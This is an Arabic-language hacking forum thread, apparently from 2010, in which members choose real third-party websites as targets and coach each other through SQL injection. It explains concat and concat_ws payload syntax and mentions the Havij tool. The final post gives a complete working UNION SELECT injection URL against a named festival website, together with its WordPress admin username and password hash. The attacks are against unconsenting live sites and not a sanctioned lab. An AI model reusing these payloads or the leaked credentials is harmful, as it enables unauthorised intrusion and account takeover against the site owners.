08-05-2010, 11:17 PM
| رقم المشاركة : 166 (permalink) | ||
 [align=center]الهدف الجديد : http://www.touringcartimes.com/news.php?id=4311
| |||
|
|
|
08-06-2010, 12:17 AM
| رقم المشاركة : 169 (permalink) | ||
| [align=center]شكرا أخي على المواقع
| |||
|
|
|
08-06-2010, 02:15 AM
| رقم المشاركة : 170 (permalink) | |||||||||||||||||||||||||
السلام عليكم أخي darkman الرمز 0x3a هو عبارة عن فاصلة لكن عندما تضيف 0x3a3a تصبح فاصلتين و هكذا exemple concat(id,0x3a,passs) resultat admin:admin mais si vous ajoutez 0x3a3a concat(id,0x3a3a,passs) resultat admin::admin بخصوص الاستعلام concat_ws هو نفسه concat لكن بدل ما نكتب الفاصلة 0x3a وسط الاستغلال نضع _ws و الفاصلة في البداية c'est t-a dire concat_ws(0x3a,id,user,parola) هي نفسها concat(id,0x3a,user,0x3a,parola) الى الأمام دائما....^_^
| ||||||||||||||||||||||||||
|
|
|
08-06-2010, 03:58 PM
| رقم المشاركة : 171 (permalink) | |||||||||||||||||||||||||
[align=center]اعتذر هذه المرة وضعت المواقع وخرجت بدون التاكد بانها صالحة للحقن... + بالنسبة لوضع الاهداف انا اعتذر عن هذه المهمة تقدر من الان انت والاخوة ان تحددو الاهداف الجديدة تحياتي [/align]
| ||||||||||||||||||||||||||
|
|
|
08-06-2010, 04:11 PM
| رقم المشاركة : 172 (permalink) | ||
| هذا أجمل شئ سمعته هذا اليوم.
| |||
|
|
|
08-06-2010, 05:19 PM
| رقم المشاركة : 174 (permalink) | |||||||||||||||||||||||||
هل حقنت الموقع الأول ب havij أخي system-32
| ||||||||||||||||||||||||||
|
|
|
08-06-2010, 05:56 PM
| رقم المشاركة : 177 (permalink) | |||||||||||||||||||||||||
أخي الكريم هل حقنت أنت هذا الموقع ؟؟؟ لأنو إصدار القاعدة 4 و خمنت أكثر من 600 إسم للجدول و لا جدوى إن كنت لم تحقنه يا غالي فتذكر ما قلنا لازم قبل أن نضع هدف أن نحقنه ليس موقع لم نستطع حقنه نضعه، لأنو ممكن عضو جديد ما يقدر يحقن فيكره ال SQL لكن لما نكون حقناه نعطيه الحل و يستفيد
التعديل الأخير تم بواسطة TIKTAKram ; 08-06-2010 الساعة 05:59 PM. | ||||||||||||||||||||||||||
|
|
|
08-06-2010, 07:10 PM
| رقم المشاركة : 179 (permalink) | |||||||||||||||||||||
مشكور اخي العزيز ooooo_darkman_ooooo ولو هذا واجبنا بالنسبة للموقع : www.imagesfestival.com والله انا حاولت اخمن اسم الجدول بس ما طلع معي مع انني جربت كتتتتتيييير.....هههه بس والله من رأي انك تضع جدول التخمين اللي بتشتغل انت عليه او الطريقة التي تستعملها ليستفاد منها الجميع ولكن بعد ان يحاول الجميع فيه ويجرب الكل عليه بالاول مشكور على التقييم بالنسبة للأخ Syst3m-32 ياريت تقلنا بأي برنامج حقنت الموقع لاني بصراحة ما جربت استعمل اي برنامج للحقن قبل الان الشي الوحيد اللي احيانا بستعملو هو شريط الهاك للفايرفوكس مشان الامر union select اذا كان عدد الاعمدة كتير ومشان تشفير كلمة %pass% فقط ومن اجل ان اعرف القليل عن فائدة هذه البرامج وكيف تساعد في الاختراق مشكووووور
| ||||||||||||||||||||||
|
|
|
08-06-2010, 07:17 PM
| رقم المشاركة : 180 (permalink) | ||
| يا دارك  ليش ما قلت لي أنه WordPress ؟؟؟جعلتني أظهر كأنني لم أستطع حقن الموقع تم الحقن بنجاح بعد معرفة السكربت WordPress إسم الجدول : wp_users إسم عمود اليوزر : user_login إسم عمود الباسوارد : user_pass يوزر الأدمن : admin باسوارده : $P$BKVumgDn3YBBmuENaVRIHGq9yEV1QN1 بالمناسبة الباسوارد مشفر تشفيرة MD5-WordPress و هذه الحقنة كاملة : كود: http://www.imagesfestival.com/volunteer.php?id=-6%20UNION%20SELECT%201,2,concat%28user_login,0x3a,user_pass%29,4,5,6,7,8+from+wp_users-- تظهر لك أني نسيت الموقع ؟؟ ههههبالتوفيق
| |||
|
|
 |
| مواقع النشر (المفضلة) |
« الموضوع السابق
|
الموضوع التالي »
العرض العادي
|
|
المواضيع المتشابهه | ||||
| الموضوع | كاتب الموضوع | المنتدى | مشاركات | آخر مشاركة |
| العدد (3) من غرفة الحقن | darkman.dz | SQL قواعد البيانات | 397 | 12-30-2010 01:23 PM |
| جهاز من غرفة جـنـسـيـة | MasTer MiND | Hackers Showoff | 6 | 06-25-2009 04:01 PM |
الساعة الآن 10:26 PM
SEO by vBSEO 3.6.0